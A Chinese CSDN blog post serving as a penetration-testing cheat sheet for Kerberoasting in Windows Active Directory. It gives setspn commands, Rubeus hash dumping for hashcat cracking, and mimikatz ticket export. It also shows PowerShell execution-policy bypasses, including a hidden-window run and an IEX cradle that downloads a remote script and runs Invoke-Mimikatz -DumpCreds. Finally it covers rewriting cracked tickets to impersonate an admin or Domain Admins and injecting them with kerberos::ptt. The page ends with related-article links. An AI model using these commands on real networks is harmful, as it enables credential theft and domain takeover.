域渗透-kerberoast Attack

最新推荐文章于 2023-03-01 15:02:53 发布
最新推荐文章于 2023-03-01 15:02:53 发布
阅读量707 收藏 2
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/106450049
版权

攻击简介

过程:

查询SPN,找到有价值的SPN,需要满足以下条件:

	1、该SPN注册在域用户帐户(Users)2、域用户账户的权限很高
	3、请求TGS
	4、导出TGS
	5、暴力破解
SETSPN
setspn -A HOST/AD.test.com  test     	#给账号申请SPN
机器:AD.test.com  帐号:test   服务:HOST 

若有些服务有端口,则可以直接这样写:
setspn -A HTTP/AD.test.com:80  test

setspn -q */*                  			#查询
setspn -d  HOST/AD.test.com  test		#删除SPN

(当前所在计算机必须有设置SPN的权限)
例如:
在这里插入图片描述
通过web用户给De1ta设置spn然后通过Kerberoasting去暴力破解De1ta用户的密码


Rubeus
Rubeus.exe kerberoast

导出hash,可以直接使用hashcat破解
并且此时已经申请到TGS并写入到了内存
此时我们可以用mimikatz提取票据 kerberos::list /export

Invoke-Kerberoast

这个平时用得比较少,自己还是习惯使用Rubeus
有时候powershell是禁止执行脚本的,这个时候需要管理员权限

运行get-executionpolicy,如果结果是Restricted,那表示禁止执行脚本
允许执行脚本:set-executionpolicy -executionpolicy unrestricted

也可以直接绕过
本地权限绕过:

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

地隐藏权限绕过:

PowerShell.exe -ExecutionPolicy Bypass -NoLogo –NonInteractive -NoProfile -WindowStyle Hidden -File xxx.ps1

IEX下载远程PS1脚本权限绕过执行:

powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘http://网址/对应脚本名称’); Invoke-Mimikatz -DumpCreds”

服务票据重写&RAM注入

Kerberos票据使用密码的NTLM哈希签名。如果票据散列已被破解,那么可以使用Kerberoast python脚本重写票据。这将允许在服务将被访问时模拟任何域用户或伪造账户。此外,提权也是可能的,因为用户可以被添加到诸如域管理员的高权限组中。

python kerberoast.py -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -u 500 #设置到高权限账户
python kerberoast.py -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -g 512#设置到高权限组

使用以下Mimikatz命令将新票据重新注入内存,以便通过Kerberos协议对目标服务执行身份验证。

kerberos::ptt PENTESTLAB.kirbi
HyyMbb
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Kerberoasting攻击
无心的博客
09-28 3070
前面我们介绍了《Windows本地认证》、《Windows网络认证》、《Windows认证》和《SPN扫描》,这次继续讲解内相关的东西。 0x01介绍 当发布Windows 2000和Active Directory时,微软打算在 Windows NT 和Windows 95 上也支持Active Directory,这意味着不仅会产生各种各样的安全问题也会导致更多不安全的配置方式。同时,也意...
Kerberoasting学习
mingyqf的博客
02-24 821
Author: Shu1L Link: https://shu1l.github.io/2020/08/05/kerberosating-gong-ji-xue-xi/ 前言 Kerberoasting攻击是Tim Medin在DerbyCon 2014 上发布的一种口令攻击方法,Tim Medin同时发布了 配套的攻击工具kerberoast。此后,不少研究人员对Ker beroasting进行了改进和扩展,在GitHub上开发发布了 大量工具,使得Kerberoasting逐渐发展成为攻击的常用方法
渗透 | kerberos认证及过程中产生的攻击
st3pby的博客
02-20 7009
Windows认证一般包括本地认证(NTLM HASH)和认证(kerberos)。认证的原理网上有很多文章。如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课本篇文章主要内容是Kerberos认证过程中产生的攻击。Kerberos是由麻省理工学院提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。Kerberos协议有两个基础认证模块:和,以及微软扩展的两个认证模块S4U和PAC。kerberos是一种基于票据的认证方式。
漏洞复现:DNS 缓存投毒的经典—— 2008年 kaminsky 漏洞
闵行小鱼塘
07-06 2469
最近研究DNS缓存投毒,那么经典的 kaminsky 漏洞自然是要尝试复现的。先用msf现成脚本,再根据理解自己写exp。巧合而又不幸的是:kaminsky大神陨落于2021.4.23,谨以此篇文章纪念大神传承遗志
记一次渗透测试实战
zhangge3663的博客
11-02 1386
0X01 突破边界拿下shell 周末在家闲着没事突然就想搞事情了,然后使用Google hack语法输入inurl:xxx.xxx.xxx/upload批量搜索可能存在上传点的网站,试了好几个最后找到一个可利用的上传点。 注:涉及敏感信息,图片仅供参考,具体内容自行填充。 0X02 反弹shell&提权 Linux下需要把shell反弹出来以方便我们操作,但是目标主机上既没有nc也没有python,查询相关资料后尝试了一下利用bash弹shell。需要一台公网服务器,使用命令ba.
Distributed-dictionary-attack
05-09
Distributed-dictionary-attack是一个Java程序,它使用增量禁止系统实现易受攻击的服务器。 在该项目中,有一些通过RabbitMQ中间件进行通信的客户端。 客户端之间交换的消息是错误的密码。 你需要什么 - - -
论文研究-An Attack-Defense Trees model based on Analytic Hierarchy Process.pdf
08-14
一种基于层次分析法的攻防树模型,费禹,蒋文保,攻击树模型是分析APT攻击的一种重要理论模型,针对目前攻击树模型缺少对于防御手段的考虑及节点联结方式不合理的问题,提出一种基
Defending Against Man-In-The-Middle Attack in Repeated Games
02-07
Defending Against Man-In-The-Middle Attack in Repeated Games
Ciphertext-only attack on optical scanning cryptography
02-11
Ciphertext-only attack on optical scanning cryptography
Laser-seeding Attack in Quantum Key Distribution
02-08
Quantum key distribution (QKD) based on the laws of quantum physics allows the secure distribution of secret keys over an insecure channel. Unfortunately, imperfect implementations of QKD compromise ...
DNS缓存投毒攻击原理与防御策略.pdf
06-03
DNS缓存投毒攻击原理与防御策略论文,转载自知网!
Rubeus-master_Rubues_zip_
09-29
Rubeus source code Rubeus
渗透-备忘录
qq_50643984的博客
03-01 606
委派获取的权限在于,委派的用户是谁,被委派什么服务,如果是普通用户,那就获得普通用户的票据,如果是管,那就是管票据,信息收集可以通过Bloodhuond。例如DC01$委派WIN2016$,那么用win2016的账户进行getST就能获取到DC01的票据了。
内网渗透—Kerberos认证
include_voidmain的博客
03-04 532
声明以下内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。0x01 前言Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过程的实现不
渗透技巧
Gamma_lab的博客
08-06 643
内网信息收集 SPN的发现 前言: 由于每台服务器都需要注册用于Kerberos身份验证服务的SPN,因此这为在不进行大规模端口扫描的情况下收集有关内网环境的信息提供了一个更加隐蔽的方法。 工具: SetSPN查询: windows系统自带的setspn可以查询内的SPN #查看当前内所有的SPN: setspn -Q */* #查看指定xie.com注册的SPN: setspn -T xie.com -Q */* setspn -X删除指定SPN 查找指定用户/主机名注册的SPN:setspn
渗透-SPN与kerberoast攻击
m0_58596609的博客
11-15 1916
一:SPN服务主体名称 SPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、MSSQL、MySQL等服务)的唯一标识符。 1.1:SPN介绍 Kerberos认证过程使用SPN将服务实例与服务登录账户相关联,如果想使用 Kerberos 协议来认证服务,那么必须正确配置SPN。如果在整个林或中的计算机上安装多个服务实例,则每个实例都必须具有自己的 SPN。如果客户端可能使用多个名称进行身份验证,则给定服务实例可以具有多个SPN。SPN 始终包含运行..
Kerberoast/Kerberoasting:攻击与检测
Ping_Pig的博客
10-21 2179
讲在前面: Kerberoasting攻击手法在渗透中是必不可缺的一项手法,它可以帮助你利用普通用户的权限在AD中提取到服务账户的凭据,又因为一般的服务账户密码策略可能较为薄弱或密码设置为永不过期等等。所以当攻击者拿到服务凭据后,花不了多大功夫就将其暴力破解了。 注意: Windows系统默认的服务已经映射到AD中的计算机账户中,该类账户具有关联的128个字符的密码,破解起来相对费劲。 针对这个问题我们需要了解如下两个协议,当然在这里我们只能简单的介绍,笔者参考了如下几篇优秀的论文以帮助您来了解K
记录一次(SYN)泛洪攻击
L17707500994的博客
05-29 735
配置路由器R1,R2,R3的IP地址,云连接到我物理主机以太网3网卡。 路由器R1: 路由器R2: 路由器R3: 路由器R2设置telnet登录: 从R1远程登录(telnet)到R2 :登录名:liangfeng 密码:cisco 登录成功 云: 以太网2的配置: Kali的配置: 这里的环回网卡就是我的以太网3 Kali的IP地址:12.1.1.10 子网掩码:255.255.255.0 网关:12.1.1.254,具体配置用vim ...
ftp服务后门
rlenew的博客
05-28 543
主机:192.168.136.133 靶机:192.168.136.128 用nmap扫靶机 先对21端口入手,用msf查看该版本漏洞 这里利用exploit/unix/ftp/proftpd_133c_backdoor版本后门漏洞渗透,设置参数然后run 直接入侵,查看权限。
Buffer-Overflow Attack Lab
最新发布
12-27
Buffer-Overflow Attack Lab是一个用于学习和实践缓冲区溢出攻击的实验。通过这个实验,你可以更好地理解缓冲区溢出攻击的原理和实现方式,并学习如何保护系统免受此类攻击。 在Buffer-Overflow Attack Lab中,你将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值